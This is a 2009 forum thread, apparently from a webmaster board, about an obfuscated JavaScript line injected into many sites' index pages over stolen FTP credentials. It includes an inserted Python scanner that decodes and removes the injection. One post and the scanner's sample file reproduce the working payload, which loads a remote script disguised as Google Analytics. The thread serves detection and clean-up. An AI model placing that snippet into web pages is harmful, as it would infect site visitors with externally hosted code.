Please help I have found a mysterious code on a lot of my websites? Is this a hack?

Discussion in 'Programming' started by canaryspace, Mar 23, 2009.

  1. Valve-Hosting

    #21
    Sorry, I meant run Kaspersky on your local PC, just to be sure. There's no virus scanner, that I know of, that can be run on a shared host.
     
    Valve-Hosting, Mar 30, 2009 IP
  2. qeorge

    #22
    I'm on HostGator and found the same code on a site today too. The modified time on the file was 3/22/09.

    The site is a junk domain I keep as a joke with friends, and the only thing on the front page is a photo. It's a flat HTML file, there's no dynamic content of any kind, so I'm sure they've somehow accessed my FTP.

    I'm changing the passwords, and will report back if they manage to do it again. I'll update if I figure out what happened.
     
    qeorge, Mar 30, 2009 IP
  3. electronicproducts

    #23
    I have had the same problem; the code was found on 28th March. I host with Easyspace, so it looks like it is affecting lots of web servers.

    The code was placed on my home page, but it also was placed in log files.

    Cleaned now and made the password more secure, but my traffic has gone down massively because Google has listed the site as "This site may harm your computer". I have gone to the Google dashboard to resubmit the site for inspection.
     
    electronicproducts, Mar 31, 2009 IP
  4. Oliver341

    #24
    My guess is that these hacks are not done through FTP, but some server-side exploit.
     
    Oliver341, Mar 31, 2009 IP
  5. claudeS

    #25
    This thread seems to be the best resource online for this problem, so I thought I'd add my findings here.
    Several of the sites I maintain have had the same line of malicious code inserted at the bottom of main/obvious index files, inside its own HTML and script tags:

    var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?"; var result = "";for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);document.write(result);

    The sites are hosted with various hosting companies, and some are simply static HTML, so this isn't due to weak PHP scripts or hosting security flaws. Having done some analysis this morning, here's what I can say:

    - The attacks are done by FTP, and the attacker knows a/the FTP username and password (my server FTP logs show this)
    - AFAIK, only default index pages (e.g. index.php and index.html) are affected - these can be in the root folder, subfolders, or the https webroot. It seems that the attacking script has a list of index files across the whole site (from a Google search perhaps?), then downloads each file by FTP, and re-uploads it with the obfuscated JavaScript inserted at the end.
    - The attacks on my site mostly took place on March 23rd, from 209.124.81.18 (wh4.wiredhub.net, but also in the Dragon IP range), but some also took place on March 5th and 6th, from 67.151.214.228 (unresolved US address)
    - I'm presuming that some sort of trojan or sniffer was present on my computer, listening for FTP passwords as I connected to my sites - this is because only my recently-updated sites have been hacked (though one hacked site was last-edited on Feb 9th 2009, so it's not just a problem from the last few days).
    - I've scanned my PC with HijackThis, MalwareBytes Anti-Malware, and AVG, and all come up clean. I'll do some more tests and report if I find anything. The only strange behaviour I'd noticed on my PC recently (it's normally pretty secure), was lots of cmd.exe / net.exe / net1.exe processes opening - these seemed to be related to my online backup iDriveEtray. I also found that my firewall (Sunbelt/Kerio Personal Firewall) had been disabled from starting with Windows. So obviously something was awry on my computer.

    Other info that may be relevant:
    - I'm based in the UK, connected to Virgin Media broadband.
    - I used FileZilla and PSPad to FTP to my websites (passwords were sent without encryption - lesson learned).
    - I've not noticed any other issues with email/websites.

    - To fix this problem, I checked my FTP logs to see which files had been edited, and removed the offending JavaScript from the end of each file (or else look for any files recently edited, in any folder, especially index files)
    - I changed my FTP passwords for the hacked sites (as someone else clearly knows them)
    - I also updated my servers (where possible) to allow FTP over SSL, so that passwords are sent encrypted.

    Hope this helps people find out what's been happening to them, and some steps to help fix/prevent it.
    Claude
     
    claudeS, Mar 31, 2009 IP
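Added example (not code from the thread or from any poster): a small Python scanner that recognises the injected line claudeS quoted, decodes the shifted string to show what it actually writes into the page, and strips it from the files it finds, following the clean-up steps in the post above (look for the code in recently edited files, especially index files, and remove it). The regex shape, the file suffixes scanned, the `modified_since` filter and the sample site built by `build_sample_site()` are assumptions made for this example; the encoded string is the one from the post.

```python
"""Find, decode and strip the shift-by-one JavaScript injection quoted above.

Added example, not code from the thread or from any poster.  It assumes the
injected payload always has the shape claudeS quoted: a string literal
assigned to `source`, then a loop that subtracts 1 from every character
code and document.write()s the result.  The site built by
build_sample_site() is constructed here for demonstration only.
"""
import re
import tempfile
from pathlib import Path

# The encoded string exactly as quoted in the thread.
SAMPLE_SOURCE = ("=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660"
                 "hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?")
# The injected line as quoted in the thread, rebuilt from that string.
INJECTED_JS = ('var source ="' + SAMPLE_SOURCE + '"; var result = "";'
               'for(var i=0;i<source.length;i++) '
               'result+=String.fromCharCode(source.charCodeAt(i)-1);'
               'document.write(result);')

# Signature of the injection: the `source` literal plus the tell-tale
# "charCodeAt(i)-1" decode loop, optionally wrapped in its own <script>.
INJECT_RE = re.compile(
    r'(?:<script[^>]*>\s*)?'
    r'var\s+source\s*=\s*"(?P<src>[^"]*)"\s*;.*?'
    r'charCodeAt\(i\)\s*-\s*1\).*?document\.write\(result\);'
    r'(?:\s*</script>)?',
    re.DOTALL,
)

# Assumed set of file types worth scanning (the thread names index.php/.html).
WEB_SUFFIXES = {".html", ".htm", ".php"}


def decode_shift1(encoded):
    """Undo the obfuscation: each character was stored as its code point + 1."""
    return "".join(chr(ord(c) - 1) for c in encoded)


def find_injections(text):
    """Return the decoded payload of every injected block found in `text`."""
    return [decode_shift1(m.group("src")) for m in INJECT_RE.finditer(text)]


def strip_injections(text):
    """Return `text` with every injected block (and its <script> wrapper) removed."""
    return INJECT_RE.sub("", text)


def scan_tree(root, modified_since=None):
    """Walk `root` and map each infected web file to its decoded payloads.

    `modified_since` (a POSIX timestamp) mirrors the "look for recently
    edited files" step: older files are skipped when it is given.
    """
    hits = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in WEB_SUFFIXES:
            continue
        if modified_since is not None and path.stat().st_mtime < modified_since:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        payloads = find_injections(text)
        if payloads:
            hits[str(path)] = payloads
    return hits


def clean_tree(root, modified_since=None):
    """Strip the injection from every infected file; return the cleaned paths."""
    cleaned = []
    for path in scan_tree(root, modified_since):
        p = Path(path)
        text = p.read_text(encoding="utf-8", errors="replace")
        p.write_text(strip_injections(text), encoding="utf-8")
        cleaned.append(path)
    return cleaned


def build_sample_site():
    """Create a constructed two-page site; the sub-folder index carries the injection."""
    root = Path(tempfile.mkdtemp(prefix="site_"))
    clean = '<html><body><img src="photo.jpg"></body></html>\n'
    (root / "index.html").write_text(clean, encoding="utf-8")
    (root / "blog").mkdir()
    (root / "blog" / "index.php").write_text(
        clean + "<script>" + INJECTED_JS + "</script>\n", encoding="utf-8")
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for path, payloads in scan_tree(site).items():
        print(path)
        for payload in payloads:
            print("  injects:", payload)
    print("cleaned:", clean_tree(site))
```

Decoding the string shows that the injected loop writes a `<script src=...>` tag that loads a file named `ga.js` from a numeric-IP host under a `google-analytics` path, i.e. it is dressed up to look like the real Google Analytics loader. That decoded host is the value to search FTP and web-server logs for and to block at the edge, rather than the attacker's FTP source addresses, which change. Run the script against a real web root by replacing `build_sample_site()` with the document root path; take a backup before calling `clean_tree()`.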
  6. Oliver341

    #26
    Interesting. My FTP passwords are very random, but I don't have access to FTP logs as my site is on shared hosting. Given that my password is strong, and I'm the only one who knows it, I still find the FTP theory (in my case) hard to believe. Possibly an FTP daemon exploit?

    I use FileZilla too. FileZilla is open source, so I'm guessing the software has not been compromised. My PC and LAN are definitely clear of viruses and malware.
     
    Oliver341, Mar 31, 2009 IP
  7. QuangVo

    #27
    I have the issue and I had to replace all my files; this took me a few days. :(
     
    QuangVo, Mar 31, 2009 IP
  8. canaryspace

    #28
    I am still finding the code on other files: index.php, index.htm, index.html, footer.php, header.php, login.php, admin/index.php, admin/login.php, register.php. It seems to be a tracking code to track usernames and passwords. I've got the guys at Heart Internet following it up for me; when I get some more info I will post to this thread. For now I would block the Dragonhost IP range, as this is where the hack originally came from according to the IP that matches the login to my FTP account at the time of the hack.

    One question I do have is: can a proxy be used to access another IP host without their consent?
     
    canaryspace, Apr 2, 2009 IP
  9. Oliver341

    #29
    Absolutely. Blocking hackers by IP address is futile because they have access to countless different IP addresses.
     
    Oliver341, Apr 2, 2009 IP
  10. canaryspace

    #30
    I just hope that someone somewhere will find the absolute source of this attack, as it has taken me a very long, stressful time clearing this code and rebuilding deleted PHP. In the meantime, I would suggest that everyone checks their own sites for this code. It will be interesting to see exactly how many sites and different hosts have been infected by this hack; it will also help us find the source.
     
    canaryspace, Apr 2, 2009 IP
  11. UseShots

    #31
    UseShots, Apr 2, 2009 IP
  12. Oliver341

    #32
    Why would so many passwords around the internet be compromised simultaneously?
     
    Oliver341, Apr 2, 2009 IP
  13. UseShots

    #33
    Passwords are being compromised and collected by hackers over time. Then they feed the collected database to a network of zombie computers that inject malicious code into legitimate web pages. This way it looks as if it happened simultaneously.
     
    UseShots, Apr 2, 2009 IP
  14. canaryspace

    #34
    UseShots, that is a nice website you got there, very handy tool indeed, thank you. I suggest we all give it a go for every one of our sites.
     
    canaryspace, Apr 2, 2009 IP